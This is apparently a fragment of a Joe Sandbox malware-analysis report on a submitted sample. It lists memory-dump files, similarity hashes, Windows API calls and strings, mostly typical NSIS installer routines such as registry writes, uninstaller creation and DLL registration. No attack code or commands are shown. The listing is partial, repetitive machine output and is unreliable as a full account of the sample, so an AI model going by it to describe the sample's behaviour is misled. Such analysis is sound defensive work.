                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
